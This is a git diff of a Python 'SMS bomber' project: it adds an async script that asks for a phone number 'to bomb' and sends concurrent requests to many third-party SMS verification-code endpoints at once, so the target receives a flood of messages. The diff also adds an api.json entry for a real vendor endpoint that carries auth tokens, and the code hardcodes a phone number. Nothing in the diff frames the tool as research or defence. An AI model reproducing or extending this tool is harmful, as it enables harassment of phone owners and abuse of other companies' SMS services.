diff --git a/api.json b/api.json index b0c2a8b..5ffcc34 100644 --- a/api.json +++ b/api.json @@ -4,9 +4,9 @@ "url": "https://biz.caiyunapp.com/v1/send_sms_code", "method": "POST", "header": { - "Referer": "https://fanyi.caiyunapp.com/", - "Cookie": "UM_distinctid=17fd5c7a9ba69a-0200a7005bf45a-56171958-146d15-17fd5c7a9bb749; _gid=GA1.2.2046680529.1648971157; _gat_gtag_UA_185151443_2=1; _ga=GA1.2.44459633.1648559084; _ga_65TZCJSDBD=GS1.1.1648971156.4.1.1648971164.0; _ga_R9YPR75N68=GS1.1.1648971156.4.1.1648971164.52", - "Cy-Token": "token 9876032166" + "Cy-Token": "token 9876032166", + "X-Authorization": "token:qgemv4jr1y38jyq6vhvi", + "app-name": "xy" }, "data": { "phone_num": "[phone]", diff --git a/config.py b/config.py deleted file mode 100644 index 6fb346a..0000000 --- a/config.py +++ /dev/null @@ -1,45 +0,0 @@ -# -*- coding: utf-8 -*- -# @Time : 2022/1/11 1:46 -# @Author : WhaleFall -# @Site : -# @File : config.py -# @Description : 项目的配置文件 -import os -from pathlib import Path -import platform -import sys - - -class Config: - BASE_DIR = Path(__file__).resolve().parent # 项目绝对目录 - SQLITE_PATH = os.path.join(BASE_DIR, 'db', 'data.db') - # 默认UA - DEFAULT_UA = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 " \ - "Safari/534.50" - LOGS_DIR = Path(BASE_DIR, 'logs') - if platform.system() == "Windows": - DATABASE_URI = 'sqlite:///' + SQLITE_PATH - else: - DATABASE_URI = 'sqlite:////' + SQLITE_PATH - - engine = create_engine(DATABASE_URI) # 数据库引擎 - - def __init__(self): - dirs = [Path(self.BASE_DIR, 'db'), self.LOGS_DIR] - for dir_ in dirs: - dir_.mkdir(exist_ok=True) - - -config = Config() # 实例化配置 - -log_config = { - # 添加接收器 - "handlers": [ - # 写入日志文件不必用颜色,rotation="1 day": 文件超过一天就会分割 - # run_{time:YYYY_M_D}.log: 日志格式 - {"sink": str(config.LOGS_DIR) + "/run_{time:YYYY_M_D}.log", "rotation": "1 day", "encoding": "utf-8", - "backtrace": True, "diagnose": True, "colorize": False, "level": "DEBUG"}, - # 标准输出流 - {"sink": sys.stdout, "backtrace": True, "diagnose": True, "colorize": True, "level": "DEBUG"}, - ], -} diff --git a/requirements.txt b/requirements.txt index 7922838..fd93597 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1 +1,4 @@ -httpx \ No newline at end of file +httpx +click +flask +flask_cors \ No newline at end of file diff --git a/smsboom.py b/smsboom.py deleted file mode 100644 index 9ad03cb..0000000 --- a/smsboom.py +++ /dev/null @@ -1,126 +0,0 @@ -# encoding=utf8 -import httpx -import json -import sys -import pathlib -import asyncio -from loguru import logger -from pydantic import BaseModel, validator -from typing import Optional, List, Union -from datetime import datetime -from urllib3 import disable_warnings -disable_warnings() - -# logger config -logger.remove() -logger.add( - sink=sys.stdout, - format="{time:YYYY-MM-DD at HH:mm:ss} - {level} - {message}", - colorize=True, - backtrace=True -) - -default_header = { - "User-Agent": "Mozilla/5.0 (Linux; U; Android 10; zh-cn; Mi 10 Build/QKQ1.191117.002) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.147 Mobile Safari/537.36 XiaoMi/MiuiBrowser/13.5.40" -} - -# current directory -path = pathlib.Path(__file__).parent - -phone = "19820294267" - - -class API(BaseModel): - desc: str = "Default" - url: str - method: str = "GET" - header: Optional[dict] - data: Optional[Union[str, dict]] - - -def load_json() -> List[API]: - """ - load json for api.json - :return: api list - """ - json_path = pathlib.Path(path, 'api.json') - if not json_path.exists(): - logger.error("Json file not exists!") - return None - - with open(json_path.resolve(), mode="r", encoding="utf8") as j: - try: - datas = json.loads(j.read()) - APIs = [ - API(**data) - for data in datas - ] - return APIs - except Exception as why: - logger.error(f"Json file syntax error:{why}") - return None - - -def timestamp_new() -> str: - """返回整数字符串时间戳""" - return str(int(datetime.now().timestamp())) - - -def replace_data(content: Union[str, dict]) -> str: - if not phone: - return content - # 统一转换成 str 再替换. - content = str(content).replace("[phone]", phone).replace( - "[timestamp]", timestamp_new()).replace("'",'"') - # 尝试 json 化 - try: - return json.loads(content) - except: - return content - - -def handle_API(API: API) -> API: - """ - :param API: one API basemodel - :return: API basemodel - """ - API.data = replace_data(API.data) - API.url = replace_data(API.url) - return API - - -async def rqs(API: API): - """requests api async function - :param API: one API basemodel - :return: - """ - API = handle_API(API) - # print(API.dict()) - async with httpx.AsyncClient(headers=default_header) as client: - try: - if not isinstance(API.data, dict): - resp = await client.request(method=API.method, headers=API.header, - url=API.url, data=API.data) - else: - resp = await client.request( - method=API.method, headers=API.header, url=API.url, json=API.data) - logger.success(f"{API.desc}-{resp.text}") - except httpx.HTTPError as exc: - logger.error(f"{API.desc} Error:{exc}") - - -@logger.catch -async def main(): - APIs = load_json() - if APIs is None: - return - - # 接收一个元组需要用 * 传参 - await asyncio.gather( - *(rqs(api) - for api in APIs) - ) - - -if __name__ == "__main__": - asyncio.run(main()) diff --git a/smsboom_async.py b/smsboom_async.py new file mode 100644 index 0000000..6208358 --- /dev/null +++ b/smsboom_async.py @@ -0,0 +1,79 @@ +# encoding=utf8 +# 短信发送异步版..... +import asyncio +import json +import pathlib +import sys + +import httpx +from loguru import logger +from urllib3 import disable_warnings +from typing import List +from utils import API, default_header + +disable_warnings() + +# logger config +logger.remove() +logger.add( + sink=sys.stdout, + format="{time:YYYY-MM-DD at HH:mm:ss} - {level} - {message}", + colorize=True, + backtrace=True +) +# current directory +path = pathlib.Path(__file__).parent + +phone = "19820294267" + + +def load_json() -> List[API]: + """load json for api.json + :return: api list + """ + json_path = pathlib.Path(path, 'api.json') + if not json_path.exists(): + logger.error("Json file not exists!") + return None + + with open(json_path.resolve(), mode="r", encoding="utf8") as j: + try: + datas = json.loads(j.read()) + APIs = [ + API(**data) + for data in datas + ] + return APIs + except Exception as why: + logger.error(f"Json file syntax error:{why}") + return None + + +async def rqs(api: API): + async with httpx.AsyncClient(headers=default_header) as c: + try: + if isinstance(api.data, dict): + resp = await c.request(method=api.method, url=api.url, json=api.data, headers=api.header) + else: + resp = await c.request(method=api.method, url=api.url, data=api.data, headers=api.header) + logger.success(f"{api.desc}-请求成功-{resp.text}") + except httpx.HTTPError as why: + logger.error(f"{api.desc}-请求错误-{why}") + + +@logger.catch +async def main(): + APIs = load_json() + if APIs is None: + return + # 接收一个元组需要用 * 传参 + await asyncio.gather( + *(rqs(api.handle_API(phone)) + for api in APIs) + ) + + + +if __name__ == "__main__": + phone = input(">>需要轰炸的手机号码:") + asyncio.run(main()) diff --git a/utils.py b/utils.py index 73a2184..92258ab 100644 --- a/utils.py +++ b/utils.py @@ -1,10 +1,20 @@ # coding=utf-8 -# 读写数据库模块 +# utils 实用工具类 import sqlite3 +import json +from datetime import datetime from pathlib import Path +from pydantic import BaseModel +from typing import Union, Optional + +default_header = { + "User-Agent": "Mozilla/5.0 (Linux; U; Android 10; zh-cn; Mi 10 Build/QKQ1.191117.002) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.147 Mobile Safari/537.36 XiaoMi/MiuiBrowser/13.5.40" +} class Sql(object): + """处理SQL数据""" + def __init__(self) -> None: '''初始化数据库''' # 数据库路径 @@ -59,3 +69,39 @@ CREATE TABLE IF NOT EXISTS API200 ( '''对象被删除时执行的函数''' print(f"共改变{self.client.total_changes}条数据!,正在关闭数据库连接......") self.client.close() + + +class API(BaseModel): + """处理自定义 API 数据""" + desc: str = "Default" + url: str + method: str = "GET" + header: Optional[Union[str, dict]] = default_header + data: Optional[Union[str, dict]] + + def replace_data(self, content: Union[str, dict], phone: str) -> str: + # 统一转换成 str 再替换. ' -> " + content = str(content).replace("[phone]", phone).replace( + "[timestamp]", self.timestamp_new()).replace("'", '"') + # 尝试 json 化 + try: + return json.loads(content) + except: + return content + + def timestamp_new(self) -> str: + """返回整数字符串时间戳""" + return str(int(datetime.now().timestamp())) + + def handle_API(self, phone: str): + """ 传入手机号处理 API + :param API: one API basemodel + :return: API basemodel + """ + # 如果传入的 header 是字符串,就转为字典. + if (isinstance(self.header, str) and self.header): + self.header = json.loads(self.header.replace("'", '"')) + + self.data = self.replace_data(self.data, phone) + self.url = self.replace_data(self.url, phone) + return self